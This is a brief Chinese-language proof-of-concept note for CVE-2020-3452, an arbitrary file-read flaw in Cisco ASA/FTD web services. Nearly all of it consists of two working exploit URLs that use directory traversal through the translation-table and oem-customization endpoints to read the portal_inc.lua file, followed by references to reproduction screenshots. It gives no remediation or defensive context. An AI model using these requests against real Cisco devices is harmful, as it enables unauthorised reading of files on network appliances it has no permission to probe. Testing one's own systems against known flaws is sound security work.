CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞 POC:one: ``` For example to read "/+CSCOE+/portal_inc.lua" file. https:///+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ``` 漏洞复现情况如下: ![](./img/67.png) POC:two: ``` https:///+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua ``` 漏洞复现情况如下: ![](./img/68.png)